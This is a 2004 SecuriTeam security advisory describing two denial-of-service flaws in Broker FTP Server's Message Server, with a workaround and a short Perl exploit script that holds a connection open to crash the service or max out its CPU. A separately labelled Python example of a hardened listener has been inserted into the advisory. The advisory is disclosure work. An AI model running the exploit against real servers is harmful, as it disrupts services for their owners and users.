[NT] Broker FTP DoS (Message Server)

From: SecuriTeam (support_at_securiteam.com)
Date: 02/11/04

    To: list@securiteam.com
    Date: 11 Feb 2004 17:33:06 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Broker FTP DoS (Message Server)
    ------------------------------------------------------------------------

    SUMMARY

    Beyond Security's SecurITeam has discovered two security vulnerabilities
    in the Broker FTP product. These vulnerabilities allow a remote attacker
    to repeatedly crash TsFtpSrv.exe (the FTP service) and to cause it to
    consume a large amount of CPU time.

    DETAILS

    Affected version:
     * Broker FTP Server version 6.1.0.0

    By connecting to the Broker FTP server's Message Server (by default
    listening on port 8701) and immediately disconnecting, it is possible to
    cause an exception in the TsFtpSrv.exe program. The exception does no
    harm beyond displaying a message that TsFtpSrv.exe has encountered an
    Application Error.

    By connecting and not sending anything (but keeping the connection open),
    it is possible to cause TsFtpSrv.exe to consume a large amount of CPU
    time (while the connection is kept open, CPU usage stays at 100%).

    Workaround:
    It is not clear what the Message Server is used for, but editing the
    [TSMessageServer] section of TsFtpSrv.ini allows an administrator to
    control which port the server listens on (and change it from the default).
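    As an added illustration (not part of this advisory and not TransSoft code), a constructed Python listener that tolerates both conditions described above: a client that connects and drops immediately is handled as end-of-file rather than an unhandled exception, and a client that connects but never sends is evicted after an assumed idle timeout instead of keeping the process at 100% CPU. The class name, the IDLE_TIMEOUT value and the stats counters are assumptions for the example.

```python
import selectors
import socket
import threading
import time

IDLE_TIMEOUT = 1.0  # seconds a silent client may hold a connection (assumed policy)

class HardenedMessageServer:
    def __init__(self, host="127.0.0.1", port=0):
        # Constructed example; port 0 asks the OS for a free ephemeral port.
        self.listener = socket.create_server((host, port))
        self.port = self.listener.getsockname()[1]
        self.sel = selectors.DefaultSelector()
        self.sel.register(self.listener, selectors.EVENT_READ)
        self.last_seen = {}  # client socket -> time of last received byte
        self.stats = {"disconnected": 0, "idle_closed": 0}
        self.running = True
        self.thread = threading.Thread(target=self._serve, daemon=True)
        self.thread.start()

    def _drop(self, conn, reason):
        self.stats[reason] += 1
        self.sel.unregister(conn)
        del self.last_seen[conn]
        conn.close()

    def _serve(self):
        while self.running:
            # Bounded blocking wait: an idle client costs no CPU time here.
            for key, _ in self.sel.select(timeout=0.1):
                if key.fileobj is self.listener:
                    conn, _ = self.listener.accept()
                    self.sel.register(conn, selectors.EVENT_READ)
                    self.last_seen[conn] = time.monotonic()
                    continue
                try:
                    data = key.fileobj.recv(1024)
                except OSError:
                    data = b""  # abrupt reset is handled as EOF, not a crash
                if data:
                    self.last_seen[key.fileobj] = time.monotonic()
                else:
                    self._drop(key.fileobj, "disconnected")
            for conn, seen in list(self.last_seen.items()):
                if time.monotonic() - seen > IDLE_TIMEOUT:
                    self._drop(conn, "idle_closed")  # evict silent clients

    def stop(self):
        self.running = False
        self.thread.join()
```

Run it, connect to the reported port with a plain TCP client, and either close at once or stay silent: the process keeps running and the stats counters record which case was handled.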

    Exploit:
    #!/usr/bin/perl -w
    # TransSoft Broker FTP Server DoS (CPU usage and Exception)
    #

    use Socket;
    if (not $ARGV[0]) {
        print qq~
            Usage: pfdos.pl <host>
        ~;
        exit;
    }

    $ip = $ARGV[0];
    print "host: " . $ip . "\n\n";
    sendexplt("A");

    sub sendexplt {
        my ($pstr) = @_;
        $target = inet_aton($ip) || die("inet_aton problems");
        socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp') || 0)
            || die("Socket problems\n");
        # Message Server port (8701 by default, see the workaround above)
        if (connect(S, pack "SnA4x8", 2, 8701, $target)) {
            select(S);
            $| = 1;
            print $pstr;
            sleep 100;    # hold the connection open, then disconnect
            close(S);
        } else {
            die("Can't connect...\n");
        }
    }

    Vendor Status:
    We informed the vendor over a month ago, at all the e-mail addresses we
    could find on its web site; as of yet, we have not received any response.

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:expert@securiteam.com>
    SecurITeam.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

